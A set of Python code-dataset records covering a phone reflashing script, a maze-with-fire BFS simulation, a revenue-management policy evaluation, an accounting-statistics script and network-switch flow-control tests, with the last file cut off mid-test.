+{"seq_id":"615651777","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*- \n\nimport os \nimport sys \nimport hashlib\nimport shutil\nimport time\nimport datetime\n\n# given a device index, return the device name read from dev.txt\ndef trans_ID(ID):\n    fp = open('/home/b/Desktop/tools/dev.txt', 'r')\n    \n    cnt = 0\n    name = fp.readline()\n    while name:\n        name = name.strip()\n        if cnt == ID:\n            break\n        \n        cnt = cnt + 1\n        name = fp.readline() \n\n    fp.close()\n    return name\ndef main():\n    if len(sys.argv) != 2:\n        print(\"no phone ID was given\")\n        return \n\n    phoneID = trans_ID(int(sys.argv[1]))\n\n    \n    os.system('cd ..')  # note: each os.system call runs in its own shell, so this cd has no lasting effect\n    os.system('adb -s %s reboot bootloader' % phoneID)\n    os.system('fastboot -s %s -w flashall' % phoneID)\n    \nif __name__==\"__main__\": main()\n\n\n","sub_path":"zHAMMERHEAD/sysimg.py","file_name":"sysimg.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"443491436","text":"import random\nimport numpy as np\nfrom queue import Queue\nimport math\nimport matplotlib.pyplot as plt\nimport copy\nfrom matplotlib.pyplot import MultipleLocator\n\n\n\n\n# The matrix has a viable path from the upper-left corner to the lower-right corner and from the upper-right corner to the lower-left corner\ndef BFS(matrix, x, y, x1, y1):\n\tvisit = np.zeros((dim,dim)) \t# Marks the points already visited\n\tvisit[x][y] = 1\t\t\t\t\t# Mark the start point visited\n\tqueue = []\t\t\t\t\t\t# Holds the points waiting to be explored\n\tqueue.append([x, y])\t\t\t# Put the start point into the queue\n\tgoal = 0\t\t\t\t\t\t# When goal = 1, the goal has been found\n\tx,y = [0, 0, 1, -1], [1, -1, 0, 0] \t# Go one step in four directions \n\n\twhile len(queue) > 0 and goal == 0:\t# Act while the queue is not empty and the goal has not been found\n\t\tsearch_point = queue.pop(0)\t\t# get queue[0], and delete it from the queue\n\t\tfor i in range(4):\t\t\t\t# Try all four directions\n\t\t\tobj_x = search_point[0] + x[i]\t# The new point\n\t\t\tobj_y = search_point[1] + y[i]\n\t\t\tif obj_x == x1 and obj_y == y1:\t# if we find the goal\n\t\t\t\tqueue.append([obj_x, obj_y])\n\t\t\t\tgoal = 1\t# Mark\n\t\t\t\tbreak\n\n\t\t\tif IsValid(obj_x, obj_y, matrix) and visit[obj_x][obj_y] == 0:\t# Check if the new point is valid \n\t\t\t\tvisit[obj_x][obj_y] = 1\t\t# this point is visited\n\t\t\t\tqueue.append([obj_x, obj_y])\t# add to the queue, waiting to be explored\n\n\tif goal == 1:\t# the goal was found\n\t\treturn True\n\telse:\t\t\t# if not\n\t\treturn False\n\ndef BFS_with_Fire(matrix):\t# Use the BFS algorithm to find a path to the goal while the fire expands\n\tvisit = np.zeros((dim, dim)) # Marks the points already visited\n\tvisit_fire = np.zeros((dim, dim)) # If a point is on fire it is 5; otherwise it counts the burning neighbours (0 if none)\n\tvisit[0][0] = 1\t\t\t# Mark the start point\n\tvisit_fire[0][dim-1] = 5\t# Mark the fire start point\n\tqueue = []\t\t\t\t\t# Holds the points waiting to be explored\n\tqueue.append([0, 0])\n\tqueue_fire = []\t\t\t\t# Holds the fire points waiting to be explored\n\tqueue_fire.append([0, dim-1])\n\tif matrix[0][dim-2] == 0:\t\t# check it is valid or not\n\t\tvisit_fire[0][dim-2] = 1\t# because [0, dim-1] is on fire, it has 1 burning neighbour\n\tif matrix[1][dim-1] == 0:\n\t\tvisit_fire[1][dim-1] = 1\t# because [0, dim-1] is on fire, it has 1 burning neighbour\n\n\tgoal = 0\n\tx,y = [0, 0, 1, -1], [1, -1, 0, 0] # the four directions a point can go\n\twhile len(queue) > 0:\n\t\tvalue = 0\t\t\t\t\t\t# if it equals 1, there is a fire point we need to process\n\t\tsearch_point = queue.pop(0)\t\t# get the first element in queue, and delete it from queue\n\t\tif len(queue_fire) > 0:\n\t\t\tsearch_point_fire = queue_fire.pop(0)\n\t\t\tvalue = 1\n\t\tfor i in range(4):\t\t# four directions\n\t\t\tobj_x = search_point[0] + x[i]\t# explore the point in each direction\t\n\t\t\tobj_y = search_point[1] + y[i]\n\n\t\t\tif obj_x == dim-1 and obj_y == dim-1: # goal found\n\t\t\t\tqueue.append([obj_x, obj_y])
\n\t\t\t\t#goal = 1\n\t\t\t\treturn True\n\n\t\t\tif IsValid(obj_x, obj_y, matrix) and visit[obj_x][obj_y] == 0 and visit_fire[obj_x][obj_y] == 0: # the point is valid, not on fire and not yet visited\n\t\t\t\tvisit[obj_x][obj_y] = 1\t\t# Mark\n\t\t\t\tqueue.append([obj_x, obj_y]) # Put the child point into the queue\n\n\t\t\tif value == 1:\t# there are fire points to check\n\t\t\t\tif visit_fire[search_point_fire[0]][search_point_fire[1]] != 5:\t# not a fire cell, but it has burning neighbours\n\t\t\t\t\tprob = 1 - math.pow(1-q, visit_fire[search_point_fire[0]][search_point_fire[1]])\t# calculate the probability that the cell catches fire\n\n\t\t\t\t\tif random.random() <= prob:\t\t# if the draw is below prob, the cell catches fire\n\t\t\t\t\t\tvisit_fire[search_point_fire[0]][search_point_fire[1]] = 5 # set 5, meaning the cell is on fire\n\t\t\t\t\t\tqueue_fire.append(search_point_fire)\n\t\t\t\t\t\tif search_point_fire in queue:\n\t\t\t\t\t\t\tqueue.remove(search_point_fire) # this cell cannot be searched any more\n\n\t\t\t\t\t\tfor i in range(4):\t# explore the neighbours of the newly burning cell\n\t\t\t\t\t\t\tobj_x_fire_1 = search_point_fire[0] + x[i]\n\t\t\t\t\t\t\tobj_y_fire_1 = search_point_fire[1] + y[i]\n\t\t\t\t\t\t\tif IsValid(obj_x_fire_1, obj_y_fire_1, matrix) and visit_fire[obj_x_fire_1][obj_y_fire_1] != 5:\n\t\t\t\t\t\t\t\tvisit_fire[obj_x_fire_1][obj_y_fire_1] += 1 # it now has one more burning neighbour\n\t\t\t\t\telse:\n\t\t\t\t\t\tqueue_fire.append(search_point_fire)\t# wait for the next check\n\n\t\t\t\telse:\t\n\t\t\t\t\tfor i in range(4):\t# Search the burning cell's neighbours\n\t\t\t\t\t\tobj_x_fire = search_point_fire[0] + x[i]\n\t\t\t\t\t\tobj_y_fire = search_point_fire[1] + y[i]\n\t\t\t\t\t\tif IsValid(obj_x_fire, obj_y_fire, matrix) and visit_fire[obj_x_fire][obj_y_fire] != 5:\t# for a valid cell, decide whether it catches fire\n\t\t\t\t\t\t\tprob = 1 - math.pow(1-q, visit_fire[obj_x_fire][obj_y_fire])\t# calculate the probability\n\n\t\t\t\t\t\t\tif random.random() <= prob:\n\t\t\t\t\t\t\t\tvisit_fire[obj_x_fire][obj_y_fire] = 5\t# catches fire\n\n\t\t\t\t\t\t\t\tqueue_fire.append([obj_x_fire, obj_y_fire]) # the new burning cell's neighbours will be checked later\n\t\t\t\t\t\t\t\tif [obj_x_fire, obj_y_fire] in queue:\n\t\t\t\t\t\t\t\t\tqueue.remove([obj_x_fire, obj_y_fire])\n\n\t\t\t\t\t\t\t\tfor i in range(4):\n\t\t\t\t\t\t\t\t\tobj_x_fire_1 = obj_x_fire + x[i]\t# increase the burning-neighbour count of the new burning cell's four neighbours\n\t\t\t\t\t\t\t\t\tobj_y_fire_1 = obj_y_fire + y[i]\n\t\t\t\t\t\t\t\t\tif IsValid(obj_x_fire_1, obj_y_fire_1, matrix) and visit_fire[obj_x_fire_1][obj_y_fire_1] != 5:\n\t\t\t\t\t\t\t\t\t\tvisit_fire[obj_x_fire_1][obj_y_fire_1] += 1\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tqueue_fire.append([obj_x_fire, obj_y_fire])\t# did not catch fire, wait for the next check
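\n\n\t\t# Worked example of the spread model above (an added note): with flammability\n\t\t# q = 0.3 and two burning neighbours, P(ignite) = 1 - (1 - 0.3)**2 = 0.51.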
\n\n\t\t#if len(wait_fire) != 0:\n\t\t#\ttemp = wait_fire.pop(0)\n\t\t#\tprob = 1 - math.pow(1-q, visit_fire[temp[0]][temp[1]])\n\t\t#\ta = random.random()\n\n\t\t#\tif a <= prob:\n\t\t#\t\tvisit_fire[temp[0]][temp[1]] = 5\n\t\t#\t\tqueue_fire.append([temp[0], temp[1]])\n\t\t#\t\tif [temp[0], temp[1]] in queue:\n\t\t#\t\t\tqueue.remove([temp[0], temp[1]])\n\n\t\t#\t\tfor i in range(4):\n\t\t#\t\t\ttemp_x = temp[0] + x[i]\n\t\t#\t\t\ttemp_y = temp[1] + y[i]\n\t\t#\t\t\tif temp_x < dim and temp_x >= 0 and temp_y < dim and temp_y >= 0 and matrix[temp_x][temp_y] == 0 and visit_fire[temp_x][temp_y] != 5:\n\t\t#\t\t\t\tvisit_fire[temp_x][temp_y] += 1\n\t\t\t\t\t\t#queue_fire.append([temp_x, temp_y])\n\t\t#\telse:\n\t\t#\t\tif [temp[0], temp[1]] not in wait_fire:\n\t\t#\t\t\twait_fire.append([temp[0], temp[1]])\n\treturn False\n\ndef IsValid(x, y, matrix):\t# check whether [x,y] in the matrix is valid\n\tif x < dim and x >= 0 and y < dim and y >= 0 and matrix[x][y] == 0:\n\t\treturn True\t\t# valid\n\telse:\n\t\treturn False\n\n\n\ndef random_matrix():\t# Produce a random maze\n\tmatrix = np.random.rand(dim,dim)\n\tn = range(dim)\n\tfor i in n: \t# For every element in the array: if its number is at most 0.2 it becomes a wall, otherwise it is road\n\t\tfor j in n:\n\t\t\tif matrix[i][j] <= 0.2:\n\t\t\t\tmatrix[i][j] = 1\n\t\t\telse:\n\t\t\t\tmatrix[i][j] = 0\n\tmatrix[0][0] = 0\t\t# The four corner cells are road\n\tmatrix[dim-1][dim-1] = 0\n\tmatrix[0][dim-1] = 0\n\tmatrix[dim-1][0] = 0\n\treturn matrix\n\ndim = 100 # dimension is 100\n# q = 0.8\nq_range=101\nsuccrate=np.zeros(q_range)\nfor i in range(q_range):\n\tq=0+0.01*i\n\tsucc=0\n\tfor k in range(100):\n\t\tmatrix = random_matrix()\t# generate a random maze\n\n\t\twhile (BFS(matrix, 0, 0, dim-1, dim-1) is False) or (BFS(matrix, dim-1, 0, 0, dim-1) is False): # keep generating until the maze has both required paths\n\t\t\tmatrix = random_matrix()\n\n\t\tif (BFS_with_Fire(copy.deepcopy(matrix))) == True:\n\t\t\tsucc+=1\n\t\t\tprint(\"Success\")\t# success\n\t\telse:\n\t\t\tprint(\"Fail\")\n\tsuccrate[i]=succ/100\nq_arr = np.arange(0, 1.01, 0.01) # The probability that a block catches fire when a neighbouring block is burning\nplt.plot(q_arr,succrate,color='r')\nplt.xlabel('flammability rate')\nplt.ylabel('success rate')\n\nx_major_locator=MultipleLocator(0.1)\ny_major_locator=MultipleLocator(0.05)\n\n\nax=plt.gca()\n\nax.xaxis.set_major_locator(x_major_locator)\n\nax.yaxis.set_major_locator(y_major_locator)\n\n# plt.xlim(-0.5,11)\n#\n# plt.ylim(-5,110)\n\n\nplt.title('Relations between success rate and flammability rate')\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"Maze Runner/Task 4/On_fire.py","file_name":"On_fire.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"235990978","text":"\"\"\"\nThis script evaluates the policy\n\"\"\"\n\nfrom B_helper import *\n\n\n#%%\nresult_folder = \"C:\\\\Users\\\\Stefan\\\\LRZ Sync+Share\\\\Masterarbeit-Klein\\\\Code\\\\Results\\\\exampleStefan-True-ES-MultiLeg-190827-1516\"\n\n#%%\na = pd.read_csv(\"0_settings.csv\", delimiter=\"\\t\", header=None)\nb = pd.read_csv(result_folder+\"\\\\0_settings.csv\", delimiter=\"\\t\", header=None)\nif not(a.equals(b)):\n    raise ValueError(\"SettingFiles don't coincide.\")\n\nlogfile, newpath, var_capacities, var_no_purchase_preferences, resources, products, revenues, A, \\\n    customer_segments, preference_weights, arrival_probabilities, times, T, time_start,\\\n    epsilon, exponential_smoothing,\\\n    K, online_K, I \\\n    = setup_testing(\"ES-evaluation\")\n\ncapacities = var_capacities[0]\nno_purchase_preference = var_no_purchase_preferences[0]\n\n\n#%%\n# generate the random sample paths (T+1 => have real life indexing starting at t=1)\n# online_K = 100\nnp.random.seed(123)\nseed(123)\ncustomer_stream = np.random.random((online_K, T+1))\nsales_stream = np.random.random((online_K, T+1))\n\ndef save_files(storagepath, *args):\n    # makedirs(storagepath)\n\n    for o in [*args]:\n        o_name = re.sub(\"[\\[\\]']\", \"\", str(varnameis(o)))\n        # print(o_name)\n        with open(storagepath + \"\\\\\" + o_name + \".data\", \"wb\") as filehandle:\n            pickle.dump(o, filehandle)\n\ndef varnameis(v): d = globals(); return [k for k in d if d[k] is v]
v]\n\n# %%\n# Actual Code\ndef get_offer_set(no_purchase_preference, c, t):\n # via index of optimal offer set\n return tuple(offer_sets.iloc[dat[str(no_purchase_preference)][t].iloc[dict_offer_sets[tuple(c)], 1]])\n\ndef get_offer_set_index(no_purchase_preference, c, t):\n # via index of optimal offer set\n return dat[str(no_purchase_preference)][t].iloc[dict_offer_sets[tuple(c)], 1]\n\n#%%\nwith open(result_folder+\"\\\\totalresults.data\", \"rb\") as filehandle:\n dat_lookup = pickle.load(filehandle)\n\ndict_offer_sets = {k:v for v,k in enumerate(list(dat_lookup[str(no_purchase_preference)][0].index))}\n\ndat = deepcopy(dat_lookup)\nfor no_purchase_preference in var_no_purchase_preferences:\n for t in np.arange(T+1):\n dat[t] = dat[str(no_purchase_preference)][t].reset_index(drop=True)\n\noffer_sets = pd.DataFrame(get_offer_sets_all(products))\n\n#%%\n# online_K+1 policy iterations (starting with 0)\n# values, products sold, offersets offered, capacities remaining\nv_results = np.array([np.zeros(len(times))]*online_K)\np_results = np.array([np.zeros(len(times))]*online_K)\nwhy_no_purchase_results = np.array([np.zeros(len(times))]*online_K)\no_results = np.zeros((online_K, len(times))) # same as above, higher skill level\nc_results = np.array([np.zeros(shape=(len(times), len(capacities)))]*online_K)\n\nvalue_final = pd.DataFrame(v_results[:, 0]) # setup result storage empty\ncapacities_final = {}\nproducts_all = {}\noffersets_all = {}\nwhy_no_purchase_all = {}\n\n#%%\nfor capacities in var_capacities:\n for preferences_no_purchase in var_no_purchase_preferences:\n print(capacities, \"of\", str(var_capacities), \" - and - \", preferences_no_purchase, \"of\", str(var_no_purchase_preferences), \"starting.\")\n\n # reset the data\n v_results = np.zeros_like(v_results)\n p_results = np.zeros_like(p_results)\n why_no_purchase_results = np.zeros_like(why_no_purchase_results, dtype=int)\n c_results = np.zeros_like(c_results)\n o_results = np.zeros_like(o_results)\n\n\n for k in np.arange(online_K)+1:\n if k % 100 == 0:\n print(\"k: \", k)\n customer_random_stream = customer_stream[k-1]\n sales_random_stream = sales_stream[k-1]\n\n # line 3\n r_result = np.zeros(len(times)) # will become v_result\n c_result = np.zeros(shape=(len(times), len(capacities)), dtype=int)\n p_result = np.zeros(len(times))\n why_no_purchase_result = np.zeros(len(times), dtype=int)\n o_result = np.zeros(len(times))\n\n # line 5\n c = deepcopy(capacities) # (starting capacity at time 0)\n\n\n offerset = np.zeros([len(times), offer_sets.shape[1]])\n for t in times:\n if any(c < 0):\n raise ValueError\n # line 7 (starting capacity at time t)\n c_result[t] = c\n\n offer_set = get_offer_set(preferences_no_purchase, c, t)\n offerset[t, :] = np.array(offer_set)\n o_result[t] = get_offer_set_index(preferences_no_purchase, c, t)\n\n # line 13 (simulate sales)\n # sold, customer = simulate_sales(offer_set, customer_random_stream[t], sales_random_stream[t],\n # arrival_probabilities, preference_weights, preferences_no_purchase)\n sold, why_no_purchase = simulate_sales_evaluation(offer_set, customer_random_stream[t],\n sales_random_stream[t], arrival_probabilities,\n preference_weights, no_purchase_preference)\n p_result[t] = sold\n why_no_purchase_result[t] = why_no_purchase\n\n # line 14\n try:\n r_result[t] = revenues[sold]\n c -= A[:, sold]\n except IndexError:\n # no product was sold\n pass\n\n # line 16-18\n v_results[k - 1] = np.cumsum(r_result[::-1])[::-1]\n c_results[k - 1] = c_result\n p_results[k - 1] = p_result\n 
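# also keep this sample path's no-purchase reasons and offer-set indices (the cumsum over reversed revenues above gives the value-to-go per period)\n 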
why_no_purchase_results[k - 1] = why_no_purchase_result\n o_results[k - 1] = o_result\n\n value_final['' + str(capacities) + '-' + str(no_purchase_preference)] = pd.DataFrame(v_results[:, 0])\n capacities_final['' + str(capacities) + '-' + str(no_purchase_preference)] = pd.DataFrame(c_results[:, -1, :])\n products_all['' + str(capacities) + '-' + str(no_purchase_preference)] = p_results\n why_no_purchase_all['' + str(capacities) + '-' + str(no_purchase_preference)] = why_no_purchase_results\n offersets_all['' + str(capacities) + '-' + str(no_purchase_preference)] = o_results\n\n# %%\n# write result of calculations\nsave_files(newpath, value_final, capacities_final, products_all, offersets_all, why_no_purchase_all)\n\n# %%\nwrapup(logfile, time_start, newpath)\n\n","sub_path":"Code/D_exact_solution_multi_leg_evaluation.py","file_name":"D_exact_solution_multi_leg_evaluation.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"79825526","text":"import sys\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nimport collections\nimport json\n\nmetrics = collections.defaultdict(int)\ndef incr(name):\n metrics[name] += 1\n\ndef add(name, num):\n metrics[name] += num\n\ndef varname(var):\n return list(dict(abc=abc).keys())[0]\n\ndef show_metrics():\n for key,val in metrics.items():\n print(\": \".join((key,str(val))))\n\ndef get(items, idx):\n if items[idx].replace(\",\",\"\").strip() in (\"#DIV/0!\", \"#NUM!\") :\n return 0\n else: \n return float(items[idx].replace(\",\",\"\").strip())\n\nclass VarObj():\n def __init__(self, name):\n self.name = name\n self.data = []\n\n def add(self, num):\n self.data.append(num)\n \n def size(self):\n return len(self.data)\n\n def sum(self):\n return np.sum(self.data)\n \n def mean(self):\n return np.sum(self.data)/len(self.data)\n\n def median(self):\n if len(self.data) == 1:\n return self.data[0]\n\n if len(self.data)%2 == 1:\n return self.data[len(self.data)//2]\n else:\n m = len(self.data)//2\n return (self.data[m] + self.data[m - 1])/2\n \n def max(self):\n return max(self.data)\n\n def min(self):\n return min(self.data)\n\n def one_quarter(self):\n pos = len(self.data) * 0.25\n if pos.is_integer():\n pos = int(pos)\n return (self.data[pos-1] + self.data[pos])/2\n else:\n return self.data[int(pos)]\n\n def three_quarter(self):\n pos = len(self.data) * 0.75\n if pos.is_integer():\n pos = int(pos)\n return (self.data[pos-1] + self.data[pos])/2\n else:\n return self.data[int(pos)]\n\n def std(self):\n square_error = 0\n mean = self.mean()\n for n in self.data:\n square_error += (n - mean)**2\n return np.sqrt(square_error)\n\n def winsor(self, percent):\n if len(self.data) == 0:\n return\n pos = len(self.data) * percent\n if pos.is_integer():\n pos = int(pos)\n num = (self.data[pos-1] + self.data[pos])/2\n for n in range(0, pos + 1):\n self.data[n] = num\n\n num = (self.data[len(self.data) - pos] + self.data[len(self.data) - pos + 1])/2\n for n in range(len(self.data) - pos, len(self.data)):\n self.data[n] = num\n else:\n pos = int(pos)\n num = self.data[pos]\n for n in range(0, pos):\n self.data[n] = num\n\n num = self.data[len(self.data) - pos]\n for n in range(len(self.data) - pos, len(self.data)):\n self.data[n] = num\n\n def __str__(self):\n self.data = sorted(self.data)\n self.winsor(0.01)\n rs=[self.mean(), self.std(), self.min(), 
self.one_quarter(), self.median(), \n self.three_quarter(), self.max()]\n return \"\\t\".join([\"%0.4f\" % x for x in rs])\n\n def __dict__(self):\n return {\"no\":\"obj\"}\n \n\ndef accounting_quality():\n keys=[\"r2\",\"syn\",\"aiq\",\"size\",\"lev\",\"mb\",\"roe\",\"inst\",\"age\",\"turnover\",\"indsize\",\"soe\"]\n datas = {\n \"r2\":VarObj(\"r2\"),\n \"syn\":VarObj(\"syn\"),\n \"aiq\":VarObj(\"aiq\"),\n \"size\":VarObj(\"size\"),\n \"lev\":VarObj(\"lev\"),\n \"mb\": VarObj(\"mb\"),\n \"roe\":VarObj(\"roe\"),\n \"inst\":VarObj(\"inst\"),\n \"age\":VarObj(\"age\"),\n \"turnover\":VarObj(\"turnover\"),\n \"indsize\":VarObj(\"indsize\"),\n \"soe\":VarObj(\"soe\")\n }\n\n year_metrics=[\"r2\", \"syn\", \"aiq\"]\n year_dict = collections.defaultdict(dict)\n for year in range(2008, 2018):\n for name in year_metrics:\n year_dict[str(year)][name] = VarObj(name)\n \n with open(\"sec_level.data\") as fd:\n reader = csv.reader(fd)\n for items in reader:\n code = items[0]\n year = items[1]\n r2 = get(items, 2)\n syn = get(items, 3)\n aiq = get(items, 4)\n size = get(items, 5)\n lev = get(items, 6)\n mb = get(items, 7)\n roe = get(items, 8)\n inst = get(items, 9)\n age = get(items, 10)\n turnover = get(items, 11)\n indsize = get(items, 12)\n soe = get(items, 13)\n\n incr(\"total\") \n\n for k in keys:\n datas[k].add(eval(k))\n\n #print(json.dumps(year_dict, default=lambda obj:obj.__dict__))\n #print(year_dict[year])\n for name in year_metrics:\n #print(year, name)\n #if name in \n #print(year_dict[name])\n year_dict[year][name].add(eval(name))\n\n show_metrics()\n for d in keys:\n print(\"%s\\t%s\" % (d, datas[d]))\n\n print(\"stats by year:\")\n with open(\"stats_by_year.txt\", \"w\") as ofd:\n for year in year_dict:\n for name in year_dict[year]:\n print(\"%s\\t%s\\t%0.4f\\t%d\\t%s\" % (year, name, year_dict[year][name].sum(), year_dict[year][name].size(), year_dict[year][name]))\n ofd.write(\"%s\\t%s\\t%d\\t%s\\n\" % (year, name, year_dict[year][name].size(), year_dict[year][name]))\n pass\n\n\ndef main():\n accounting_quality()\n pass\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"stockshare/analysis_aiq.py","file_name":"analysis_aiq.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"259079469","text":"\"\"\"\n@copyright Copyright (c) 2011 - 2016, Intel Corporation.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\n@file test_pfc_samples.py\n\n@summary Samples for PFC configuration.\n\n@details\nFollowing test cases are tested:\n1. Verify that device doesn't flood received pause frames when flow control\n mode is configured.\n2. 
Verify that \"RxTx\" flow control manages traffic correctly.\n\"\"\"\nimport time\n\nimport pytest\n\nfrom testlib import helpers\n\n\n@pytest.mark.flow_control\n@pytest.mark.simplified\nclass TestPFCSamples(object):\n \"\"\"\n @description Suite for PFC testing\n \"\"\"\n\n# Attributes and Properties\n\n def rate_decreasing(self, pf_rate=None, quanta=None, pause_frame_size=64,\n full_rate=None, actual_rate=None):\n \"\"\"\n @brief Calculated expected line rate during stream of pause frames is sending.\n @param pf_rate: PFC rate\n @type pf_rate: int\n @param quanta: PFC quanta\n @type quanta: int\n @param pause_frame_size: PFC frame size\n @type pause_frame_size: int\n @param full_rate: full rate\n @type full_rate: int\n @param actual_rate: actual rate\n @type actual_rate: int\n @rtype: bool\n @return: True if actual rate is equal to the calculated expected line rate\n \"\"\"\n x = pf_rate // 10\n ptime = quanta * 96\n frame_rate = (x * 1000000000) // (pause_frame_size + 20) // 8\n sweeper_p = frame_rate * ptime\n delay_sent = (sweeper_p * 100.) / 1000000000\n delay_received = 100 - delay_sent\n expected_rate = (full_rate * delay_received) / 100\n if expected_rate <= 0:\n expected_rate = 0\n if not actual_rate - expected_rate == 0:\n return False\n else:\n return True\n else:\n if abs(actual_rate - expected_rate) <= 10:\n return True\n else:\n return False\n\n def full_rate(self, sw_instance=None, tested_port=None, frame_size=None):\n \"\"\"\n @brief Calculation of full line rate for tested ports.\n @param sw_instance: switch instance\n @type sw_instance: SwitchGeneral\n @param tested_port: switch port ID\n @type tested_port: int\n @param frame_size: frame size\n @type frame_size: int\n @rtype: int\n @return: full line rate\n \"\"\"\n speed_value = sw_instance.ui.get_table_ports([tested_port], True)[0]['speed']\n full_line_rate = (speed_value * 1000000.) 
/ ((frame_size + 20) / 8)\n return full_line_rate\n\n# Test Cases\n @pytest.mark.skip(\"Pypacker does not support Pause frames\")\n def test_sent_pause_frames(self, env):\n \"\"\"\n @brief Verify that device doesn't flood received pause frames when flow control mode is configured.\n @steps\n -# Configure FlowControl on switch ports.\n -# Send PFC frames to the switch.\n -# Verify PFC frames are not flooded.\n @endsteps\n \"\"\"\n # Define active ports\n ports = env.get_ports([['tg1', 'sw1', 3], ])\n\n # Disable all ports and enabling only necessary ones:\n helpers.set_all_ports_admin_disabled(env.switch)\n helpers.set_ports_admin_enabled(env.switch, ports)\n\n # Wait until ports will be in forwarding state.\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][1],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][2],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][3],\n timeout=120)\n\n # Configure stream of pause frame.\n pause_frame = ({\"Ethernet\": {\"dst\": \"01:80:C2:00:00:01\",\n \"src\": \"00:00:00:00:01:44\",\n \"type\": 0x8808}},\n {\"Pause\": {\"opcode\": 0x0001, \"ptime\": 1}})\n stream = env.tg[1].set_stream(pause_frame,\n count=10,\n iface=ports[('tg1', 'sw1')][1])\n\n sniff_ports = list(ports[('tg1', 'sw1')].values())\n\n # Configure flow control values for all active ports.\n env.switch[1].ui.set_flow_control_type([ports[('sw1', 'tg1')][1],\n ports[('sw1', 'tg1')][2],\n ports[('sw1', 'tg1')][3]],\n control_type='RxTx')\n\n # Start capture\n env.tg[1].start_sniff(sniff_ports, sniffing_time=5)\n # Send pause frame from the TG port 1.\n env.tg[1].send_stream(stream)\n\n data = env.tg[1].stop_sniff(sniff_ports)\n helpers.print_sniffed_data_brief(data)\n # Verify that Pause Frames are not forwarded from tested ports.\n params = ({'layer': \"Ethernet\",\n 'field': \"dst\",\n 'value': \"01:80:C2:00:00:01\".lower()}, )\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[0],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 1 when PF traffic is sent\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[1],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 2 when PF traffic is sent\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[2],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 3 when PF traffic is sent\"\n\n @pytest.mark.skip(\"Pypacker does not support Pause frames\")\n def test_rxtx_flow_control(self, env):\n \"\"\"\n @brief Verify that \"RxTx\" flow control manages traffic correctly.\n @steps\n -# Configure FlowControl on switch ports in 'RxTx' mode.\n -# Send stream of unicast packets with 50% rate to the port 1.\n -# Send stream of unicast packets with 50% rate to the port 2.\n -# Send PFC frames to the port 3.\n -# Verify that line rate on TG port 3 decreases after pause frames with middle quanta are sending\n @endsteps\n \"\"\"\n self.suite_logger.info(\"Define variables for test execution\")\n pause_frame_rate = 30\n quanta_value = 4096\n\n # Define active ports\n ports = env.get_ports([['tg1', 'sw1', 3], ])\n\n # Disable all ports and enabling only necessary ones:\n 
helpers.set_all_ports_admin_disabled(env.switch)\n helpers.set_ports_admin_enabled(env.switch, ports)\n\n # Wait until ports will be in forwarding state.\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][1],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][2],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][3],\n timeout=120)\n\n # Configure two streams of unicast packets.\n packet_1 = ({\"Ethernet\": {\"dst\": \"00:00:00:00:00:33\",\n \"src\": \"00:00:00:00:00:11\",\n \"type\": 0x0800}},\n {\"IP\": {}})\n packet_2 = ({\"Ethernet\": {\"dst\": \"00:00:00:00:00:33\",\n \"src\": \"00:00:00:00:00:22\",\n \"type\": 0x0800}},\n {\"IP\": {}})\n stream_1 = env.tg[1].set_stream(packet_1,\n iface=ports[('tg1', 'sw1')][1],\n rate=50,\n continuous=True)\n stream_2 = env.tg[1].set_stream(packet_2,\n iface=ports[('tg1', 'sw1')][2],\n rate=50,\n continuous=True)\n\n sniff_ports = list(ports[('tg1', 'sw1')].values())\n\n # Configure flow control values for all active ports.\n env.switch[1].ui.set_flow_control_type([ports[('sw1', 'tg1')][1],\n ports[('sw1', 'tg1')][2],\n ports[('sw1', 'tg1')][3]],\n control_type='RxTx')\n\n # Enable Flow Control on TG port 1 and port 2\n env.tg[1].set_flow_control(ports[('tg1', 'sw1')][1], True)\n env.tg[1].set_flow_control(ports[('tg1', 'sw1')][2], True)\n\n # Send stream of unicast packets from TG port 1.\n env.tg[1].start_streams([stream_1, stream_2, ])\n time.sleep(3)\n\n # Configure stream of pause frames\n 